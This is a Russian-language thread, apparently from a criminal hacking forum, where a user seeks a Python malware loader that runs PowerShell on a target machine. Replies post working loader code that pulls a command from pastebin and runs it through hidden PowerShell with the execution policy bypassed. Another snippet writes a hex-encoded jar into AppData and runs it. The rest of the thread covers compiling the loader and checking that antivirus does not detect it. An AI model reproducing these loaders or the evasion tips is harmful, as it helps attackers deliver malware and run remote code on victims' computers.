Ищу лоадер для своих задач. Python. Нужно сделать выполнение строки powershall на целевой машине.
Куплю готовый или возьму в аренду
ПМ
Куплю готовый или возьму в аренду
ПМ
-
XSS.stack #1 – первый литературный журнал от юзеров форума
лоадер
- Автор темы TintoBruss
- Дата начала
Python:
import subprocess
import http.client
pastebin_path = '/raw/..........'
psh_cmd = 'powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command'
# Get PSH command
conn = http.client.HTTPSConnection("pastebin.com")
conn.request("GET", pastebin_path)
r1 = conn.getresponse()
if r1.status == 200:
cmd = r1.read().rstrip().decode("utf-8")
# Run PSH command
res_cmd = f'{psh_cmd} {cmd}'.split()
print(f'Running command: {psh_cmd} {cmd}')
try:
subprocess.run(res_cmd)
except FileNotFoundError:
print('PSH not found?')
else:
print(f'HTTP status is {r1.status}')
Скомпилируешь, от веса ахуеешь..
166 kb с upx
А без upx?
Где-то 500 кб
Втыканул. Если собирать с
--standalone --onefile получится метров под 9.разве на пайтоне скомпилируемый софт не светится?
AntiScan.Me | main.exe | 0/26
Scan your file online with multiple different antiviruses without distributing the results of your scan.
antiscan.me
Нет, не светится, там проблема в другом, в том что он запускается только на машинах с такой же ОС, разрядностью, и.т.д как на той что скомпилирован. То есть отстук будет малый
но эта проблема решается?)
Конечно решается, как и все проблемы. Использованием другого языка для написания лоадера.
Помню то же искал въебался на школо локер
может кому пригодится
Код:
import os
username =os .getenv ('username')
x ="504B030414000"
f =open ("C:\\Users\\"+username +"\\AppData\\Local\\code.jar","wb+")
f .write (x .decode ('hex'))
f .close ()
os .system ("C:\\Users\\"+username +"\\AppData\\Local\\code.jar")
Вот тут есть вероятное решение проблемы с pyinstaller
Create an exe compatible with all versions of windows 64-bit and 32-bit even if python isn't installed with pyinstaller
I have used pyinstaller to create an exe from a python script on Windows 10 64-bit. How can i setup the exe so that it runs on my other machine with Windows 8 32-bit. Please note i have not installed
stackoverflow.com
попробовал ради интереса собрать в nuitka c сключем --onefile под линуксом, вес подозрительно мал. 184кб
Это из за того что нуитка код питона в Си переводит и только потом компилит
Ага, к сожалению зависимости никуда не деваются =)
Тоже удивился сначала малому весу под nuitka, потом выяснилось, что оно просто динамически слинковано с уже установленными пайтон зависимостями в ОС.
Ну всё же лучше чем pyinstaller)))
Что то я попробовал собрать и с pyinstaller и с nuitka, оба нормально не компилят, код не работает на других пк, мб в коде дело или ещё что то.
Писать лодырь на Питоне, это как без одной ноги пробовать перейти ущелье по узенькой досточке. И вот эта досточка, это лоадер на Питоне, ебанёт или нет, неизвестно. Но скорее да, чем нет и доставка мальваря провалится с треском. Проверял это на практике. Лучше на другом ЯП писать подобные вещи
А так, удачи в попытках и тестах
А так, удачи в попытках и тестах